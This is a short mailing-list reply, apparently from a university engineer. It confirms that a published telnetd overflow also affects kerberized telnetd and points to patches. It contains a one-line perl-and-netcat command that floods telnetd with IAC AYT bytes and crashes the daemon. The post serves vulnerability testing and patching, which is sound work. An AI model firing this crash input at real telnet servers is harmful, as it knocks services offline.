Yes, it does.
I tested as suggested on the FreeBSD security list with the following command
to our kerberized telnetd, and it dumped core.
perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c x1000 . "\r\n"' \
| nc localhost 23
(The nc command is netcat-1.10 from ftp://avian.org/src/hacks/.)
The following patches, by Kerberos version, were applied to our kerberized
telnetd to temporarily plug the hole:
ftp://ftp.cs.washington.edu/cse/patches/krb5-1.1.1.patch
ftp://ftp.cs.washington.edu/cse/patches/krb5-1.2.2.patch
The patches were derived from an earlier version of the FreeBSD patches
before the FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd
(http://docs.freebsd.org/mail/current/freebsd-announce.html) was
issued, so the patches may not be up to date.
---
Voradesh Yenbut Software Engineer, CSE
1 206 685-0912 BOX 352350, U of Washington
[EMAIL PROTECTED] Seattle, WA 98195
> So, most of my machines don't use the standard vendor telnet, but
> instead use one form or another of a kerberized telnet. Does anyone
> know if today's announcement applies to kerberized telnetd's?
>
> http://www.securityfocus.com/bid/3064
>
> --
> John "kzin" Rudd http://people.ucsc.edu/~jrudd
> Truth decays into beauty, while beauty soon becomes merely charm. Charm
> ends up as strangeness, and even that doesn't last. (Physics of Quarks)
> -----===== Kein Mitleid Fu:r MicroSoft (www.kmfms.com) ======-----
>